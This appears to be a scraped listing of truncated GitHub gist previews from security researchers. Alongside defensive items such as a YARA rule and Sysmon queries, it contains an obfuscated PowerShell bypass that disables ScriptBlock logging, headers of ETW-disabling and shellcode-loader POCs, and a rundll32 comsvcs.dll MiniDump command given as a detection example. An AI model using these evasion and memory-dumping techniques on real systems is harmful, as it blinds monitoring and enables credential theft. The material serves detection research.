This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
private rule MachO | |
{ | |
meta: | |
description = "Mach-O executable" | |
category = "macho" | |
condition: | |
(uint32(0) == 0xfeedface or uint32(0) == 0xcafebabe | |
or uint32(0) == 0xbebafeca or uint32(0) == 0xcefaedfe | |
or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on | |
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET. | |
// | |
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables, | |
// and then resuming the process. | |
// | |
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/) | |
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0" | |
#define INJECT_PARAM_LEN 43 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
``` | |
Author: @0x1FFFFF | |
Date: 1 September, 2021 | |
Goal: Enumerate the human readable permission listed in Sysmon EID 10s. | |
Note: This type of logic is too heavy to run inline in a search. Use this to generate results and add to a lookup table. | |
``` | |
$Your_Sysmon_Logic_Here$ EventCode=10 | |
| stats count by GrantedAccess |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
Grab Forest Trusts. | |
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import System; | |
import System.Runtime.InteropServices; | |
import System.Reflection; | |
import System.Reflection.Emit; | |
import System.Runtime; | |
import System.Text; | |
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ScriptBlock Logging Bypass | |
# @cobbr_io | |
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
If ($GroupPolicyField) { | |
$GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
} |
We can't make this file beautiful and searchable because it's too large.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CLSID,ClassName | |
{0000031A-0000-0000-C000-000000000046},CLSID | |
{0000002F-0000-0000-C000-000000000046},CLSID CLSID_RecordInfo | |
{00000100-0000-0010-8000-00AA006D2EA4},CLSID DAO.DBEngine.36 | |
{00000101-0000-0010-8000-00AA006D2EA4},CLSID DAO.PrivateDBEngine.36 | |
{00000103-0000-0010-8000-00AA006D2EA4},CLSID DAO.TableDef.36 | |
{00000104-0000-0010-8000-00AA006D2EA4},CLSID DAO.Field.36 | |
{00000105-0000-0010-8000-00AA006D2EA4},CLSID DAO.Index.36 | |
{00000106-0000-0010-8000-00AA006D2EA4},CLSID DAO.Group.36 | |
{00000107-0000-0010-8000-00AA006D2EA4},CLSID DAO.User.36 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
By @JohnLaTwC | |
References: | |
https://risksense.com/blog/hidden-gems-in-windows-the-hunt-is-on/ by Jenna Magius and Nate Caroe (@RiskSense) | |
https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ | |
Detection Examples: | |
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump <PID> \Windows\Temp\<filename>.dmp full |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Script author: Matt Graeber (@mattifestation) | |
# logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets | |
# Do your malicious things here that would be logged by AMSI | |
# logman stop AMSITrace -ets | |
$OSArchProperty = Get-CimInstance -ClassName Win32_OperatingSystem -Property OSArchitecture | |
$OSArch = $OSArchProperty.OSArchitecture | |
$OSPointerSize = 32 | |
if ($OSArch -eq '64-bit') { $OSPointerSize = 64 } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
""" | |
Very simple HTTP server in python for logging requests | |
Usage:: | |
./server.py [<port>] | |
""" | |
from http.server import BaseHTTPRequestHandler, HTTPServer | |
import logging | |
class S(BaseHTTPRequestHandler): |